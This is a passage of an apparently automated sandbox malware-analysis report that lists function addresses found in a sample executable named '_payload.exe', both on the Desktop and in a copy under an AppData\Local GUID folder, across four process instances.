                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047D2400_2_0047D240
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00489F900_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004750570_2_00475057
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047C0700_2_0047C070
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0049E0030_2_0049E003
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0049F0100_2_0049F010
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004780300_2_00478030
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004770E00_2_004770E0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004801600_2_00480160
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_005381130_2_00538113
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004721C00_2_004721C0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_005393430_2_00539343
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004B237E0_2_004B237E
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004754470_2_00475447
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004754570_2_00475457
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004784C00_2_004784C0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004A44FF0_2_004A44FF
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004B95060_2_004B9506
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004BB5B10_2_004BB5B1
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047A6600_2_0047A660
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004796860_2_00479686
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0048E6900_2_0048E690
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004767400_2_00476740
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004727500_2_00472750
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047A7100_2_0047A710
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047F7300_2_0047F730
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004787800_2_00478780
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004BD7A10_2_004BD7A1
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0049C8040_2_0049C804
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004768800_2_00476880
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004F19200_2_004F1920
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004BD9DC0_2_004BD9DC
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004769F30_2_004769F3
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004B9A710_2_004B9A71
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004B3B400_2_004B3B40
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00472B800_2_00472B80
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00476B800_2_00476B80
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004BACFF0_2_004BACFF
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00479CF90_2_00479CF9
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047DD400_2_0047DD40
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00497D6C0_2_00497D6C
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047BDC00_2_0047BDC0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00479DFA0_2_00479DFA
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0049CE510_2_0049CE51
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00476EE00_2_00476EE0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00479F760_2_00479F76
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00490F300_2_00490F30
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004B9FE30_2_004B9FE3
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0049E0032_2_0049E003
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047D2402_2_0047D240
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0048E6902_2_0048E690
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047F7302_2_0047F730
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004F19202_2_004F1920
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00489F902_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004750572_2_00475057
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047C0702_2_0047C070
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0049F0102_2_0049F010
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004780302_2_00478030
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004770E02_2_004770E0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004801602_2_00480160
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_005381132_2_00538113
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004721C02_2_004721C0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_005393432_2_00539343
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004B237E2_2_004B237E
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004754472_2_00475447
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004754572_2_00475457
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004784C02_2_004784C0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004A44FF2_2_004A44FF
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004B95062_2_004B9506
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004BB5B12_2_004BB5B1
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047A6602_2_0047A660
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004796862_2_00479686
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004767402_2_00476740
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004727502_2_00472750
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047A7102_2_0047A710
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004787802_2_00478780
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004BD7A12_2_004BD7A1
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0049C8042_2_0049C804
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004768802_2_00476880
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004BD9DC2_2_004BD9DC
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004769F32_2_004769F3
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004B9A712_2_004B9A71
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004B3B402_2_004B3B40
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00472B802_2_00472B80
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00476B802_2_00476B80
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004BACFF2_2_004BACFF
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00479CF92_2_00479CF9
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047DD402_2_0047DD40
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00497D6C2_2_00497D6C
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047BDC02_2_0047BDC0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00479DFA2_2_00479DFA
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0049CE512_2_0049CE51
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00476EE02_2_00476EE0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00479F762_2_00479F76
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00490F302_2_00490F30
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004B9FE32_2_004B9FE3
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E4E0033_2_00E4E003
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E3E6903_2_00E3E690
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2F7303_2_00E2F730
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00EA19203_2_00EA1920
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E39F903_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E270E03_2_00E270E0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2C0703_2_00E2C070
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E250573_2_00E25057
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E280303_2_00E28030
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E4F0103_2_00E4F010
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E221C03_2_00E221C0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E301603_2_00E30160
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00EE81133_2_00EE8113
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2D2403_2_00E2D240
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E6237E3_2_00E6237E
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00EE93433_2_00EE9343
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E544FF3_2_00E544FF
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E284C03_2_00E284C0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E254473_2_00E25447
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E254573_2_00E25457
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E6B5B13_2_00E6B5B1
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E695063_2_00E69506
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E296863_2_00E29686
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2A6603_2_00E2A660
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E6D7A13_2_00E6D7A1
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E287803_2_00E28780
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E267403_2_00E26740
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E227503_2_00E22750
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2A7103_2_00E2A710
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E268803_2_00E26880
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E4C8043_2_00E4C804
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E269F33_2_00E269F3
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E6D9DC3_2_00E6D9DC
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E69A713_2_00E69A71
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E22B803_2_00E22B80
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E26B803_2_00E26B80
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E63B403_2_00E63B40
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E6ACFF3_2_00E6ACFF
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E29CF93_2_00E29CF9
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E29DFA3_2_00E29DFA
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2BDC03_2_00E2BDC0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E47D6C3_2_00E47D6C
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2DD403_2_00E2DD40
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E26EE03_2_00E26EE0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E4CE513_2_00E4CE51
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E69FE33_2_00E69FE3
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E29F763_2_00E29F76
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E40F303_2_00E40F30
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E39F904_2_00E39F90
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E270E04_2_00E270E0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2C0704_2_00E2C070
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E250574_2_00E25057
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E280304_2_00E28030
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E4E0034_2_00E4E003
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E4F0104_2_00E4F010
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E221C04_2_00E221C0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E301604_2_00E30160
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00EE81134_2_00EE8113
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2D2404_2_00E2D240
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E6237E4_2_00E6237E
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00EE93434_2_00EE9343
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E544FF4_2_00E544FF
